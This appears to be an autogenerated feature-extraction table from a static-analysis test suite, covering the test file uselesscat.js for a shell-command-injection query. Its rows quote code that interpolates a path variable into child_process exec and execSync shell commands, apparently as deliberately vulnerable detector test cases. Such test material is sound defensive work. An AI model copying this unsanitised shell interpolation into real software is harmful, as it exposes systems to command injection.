autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:1:26:58 | exec(`c ... t) { }) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:6:26:32 | `cat ${ ... ep foo` | CalleeFlexibleAccessPath | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:6:26:32 | `cat ${ ... ep foo` | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:6:26:32 | `cat ${ ... ep foo` | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:6:26:32 | `cat ${ ... ep foo` | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:6:26:32 | `cat ${ ... ep foo` | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:6:26:32 | `cat ${ ... ep foo` | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:7:26:10 | cat | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:7:26:10 | cat | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:7:26:10 | cat | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:7:26:10 | cat | stringConcatenatedWith | -endpoint- newpath + ' \| grep foo' | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:13:26:19 | newpath | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:13:26:19 | newpath | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:13:26:19 | newpath | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:13:26:19 | newpath | stringConcatenatedWith | 'cat ' -endpoint- ' \| grep foo' | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:21:26:31 | \| grep foo | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:21:26:31 | \| grep foo | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:21:26:31 | \| grep foo | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:21:26:31 | \| grep foo | stringConcatenatedWith | 'cat ' + newpath -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:35:26:34 | this | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:35:26:34 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:35:26:34 | this | enclosingFunctionBody | err out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:35:26:34 | this | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:35:26:34 | this | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:35:26:57 | 'arguments' object of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:35:26:57 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:35:26:57 | 'arguments' object of anonymous function | enclosingFunctionBody | err out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:35:26:57 | 'arguments' object of anonymous function | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:35:26:57 | 'arguments' object of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:35:26:57 | exceptional return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:35:26:57 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:35:26:57 | exceptional return of anonymous function | enclosingFunctionBody | err out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:35:26:57 | exceptional return of anonymous function | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:35:26:57 | exceptional return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:35:26:57 | functio ... ut) { } | CalleeFlexibleAccessPath | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:35:26:57 | functio ... ut) { } | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:35:26:57 | functio ... ut) { } | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:35:26:57 | functio ... ut) { } | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:35:26:57 | functio ... ut) { } | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:35:26:57 | functio ... ut) { } | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:35:26:57 | return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:35:26:57 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:35:26:57 | return of anonymous function | enclosingFunctionBody | err out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:35:26:57 | return of anonymous function | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:35:26:57 | return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:45:26:47 | err | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:45:26:47 | err | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:45:26:47 | err | enclosingFunctionBody | err out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:45:26:47 | err | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:45:26:47 | err | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:50:26:52 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:50:26:52 | out | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:50:26:52 | out | enclosingFunctionBody | err out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:50:26:52 | out | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:50:26:52 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:28:1:28:8 | execSync | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:28:1:28:8 | execSync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:28:1:28:8 | execSync | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:28:1:28:39 | exceptional return of execSyn ... 1000}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:28:1:28:39 | exceptional return of execSyn ... 1000}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:28:1:28:39 | exceptional return of execSyn ... 1000}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:28:1:28:39 | execSyn ... 1000}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:28:1:28:39 | execSyn ... 1000}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:28:1:28:39 | execSyn ... 1000}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:28:10:28:25 | `cat ${newpath}` | CalleeFlexibleAccessPath | execSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:28:10:28:25 | `cat ${newpath}` | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:28:10:28:25 | `cat ${newpath}` | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:28:10:28:25 | `cat ${newpath}` | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:28:10:28:25 | `cat ${newpath}` | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:28:10:28:25 | `cat ${newpath}` | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:28:11:28:14 | cat | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:28:11:28:14 | cat | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:28:11:28:14 | cat | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:28:11:28:14 | cat | stringConcatenatedWith | -endpoint- newpath | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:28:17:28:23 | newpath | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:28:17:28:23 | newpath | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:28:17:28:23 | newpath | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:28:17:28:23 | newpath | stringConcatenatedWith | 'cat ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:28:28:28:38 | {uid: 1000} | CalleeFlexibleAccessPath | execSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:28:28:28:38 | {uid: 1000} | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:28:28:28:38 | {uid: 1000} | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:28:28:28:38 | {uid: 1000} | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:28:28:28:38 | {uid: 1000} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:28:28:28:38 | {uid: 1000} | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:28:29:28:31 | uid | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:28:29:28:31 | uid | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:28:29:28:31 | uid | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:28:29:28:37 | uid: 1000 | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:28:29:28:37 | uid: 1000 | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:28:29:28:37 | uid: 1000 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:28:29:28:37 | uid: 1000 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:28:29:28:37 | uid: 1000 | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:28:29:28:37 | uid: 1000 | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:28:34:28:37 | 1000 | CalleeFlexibleAccessPath | execSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:28:34:28:37 | 1000 | InputAccessPathFromCallee | 1.uid | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:28:34:28:37 | 1000 | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:28:34:28:37 | 1000 | assignedToPropName | uid | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:28:34:28:37 | 1000 | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:28:34:28:37 | 1000 | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:28:34:28:37 | 1000 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:28:34:28:37 | 1000 | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:1:30:4 | exec | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:1:30:4 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:1:30:4 | exec | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:1:30:64 | exceptional return of exec('c ... t) { }) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:1:30:64 | exceptional return of exec('c ... t) { }) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:1:30:64 | exceptional return of exec('c ... t) { }) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:1:30:64 | exec('c ... t) { }) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:1:30:64 | exec('c ... t) { }) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:1:30:64 | exec('c ... t) { }) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:6:30:23 | 'cat *.js \| wc -l' | CalleeFlexibleAccessPath | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:6:30:23 | 'cat *.js \| wc -l' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:6:30:23 | 'cat *.js \| wc -l' | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:6:30:23 | 'cat *.js \| wc -l' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:6:30:23 | 'cat *.js \| wc -l' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:6:30:23 | 'cat *.js \| wc -l' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:26:30:38 | { cwd: './' } | CalleeFlexibleAccessPath | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:26:30:38 | { cwd: './' } | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:26:30:38 | { cwd: './' } | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:26:30:38 | { cwd: './' } | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:26:30:38 | { cwd: './' } | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:26:30:38 | { cwd: './' } | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:28:30:30 | cwd | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:28:30:30 | cwd | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:28:30:30 | cwd | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:28:30:36 | cwd: './' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:28:30:36 | cwd: './' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:28:30:36 | cwd: './' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:28:30:36 | cwd: './' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:28:30:36 | cwd: './' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:28:30:36 | cwd: './' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:33:30:36 | './' | CalleeFlexibleAccessPath | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:33:30:36 | './' | InputAccessPathFromCallee | 1.cwd | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:33:30:36 | './' | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:33:30:36 | './' | assignedToPropName | cwd | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:33:30:36 | './' | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:33:30:36 | './' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:33:30:36 | './' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:33:30:36 | './' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:41:30:40 | this | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:41:30:40 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:41:30:40 | this | enclosingFunctionBody | err out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:41:30:40 | this | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:41:30:40 | this | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:41:30:63 | 'arguments' object of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:41:30:63 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:41:30:63 | 'arguments' object of anonymous function | enclosingFunctionBody | err out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:41:30:63 | 'arguments' object of anonymous function | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:41:30:63 | 'arguments' object of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:41:30:63 | exceptional return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:41:30:63 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:41:30:63 | exceptional return of anonymous function | enclosingFunctionBody | err out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:41:30:63 | exceptional return of anonymous function | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:41:30:63 | exceptional return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:41:30:63 | functio ... ut) { } | CalleeFlexibleAccessPath | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:41:30:63 | functio ... ut) { } | InputArgumentIndex | 2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:41:30:63 | functio ... ut) { } | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:41:30:63 | functio ... ut) { } | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:41:30:63 | functio ... ut) { } | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:41:30:63 | functio ... ut) { } | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:41:30:63 | return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:41:30:63 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:41:30:63 | return of anonymous function | enclosingFunctionBody | err out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:41:30:63 | return of anonymous function | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:41:30:63 | return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:51:30:53 | err | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:51:30:53 | err | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:51:30:53 | err | enclosingFunctionBody | err out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:51:30:53 | err | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:51:30:53 | err | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:56:30:58 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:56:30:58 | out | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:56:30:58 | out | enclosingFunctionBody | err out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:56:30:58 | out | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:56:30:58 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:32:1:32:8 | execSync | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:32:1:32:8 | execSync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:32:1:32:8 | execSync | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:32:1:32:34 | exceptional return of execSyn ... path}`) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:32:1:32:34 | exceptional return of execSyn ... path}`) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:32:1:32:34 | exceptional return of execSyn ... path}`) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:32:1:32:34 | execSyn ... path}`) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:32:1:32:34 | execSyn ... path}`) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:32:1:32:34 | execSyn ... path}`) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:32:10:32:33 | `cat fo ... wpath}` | CalleeFlexibleAccessPath | execSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:32:10:32:33 | `cat fo ... wpath}` | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:32:10:32:33 | `cat fo ... wpath}` | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:32:10:32:33 | `cat fo ... wpath}` | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:32:10:32:33 | `cat fo ... wpath}` | 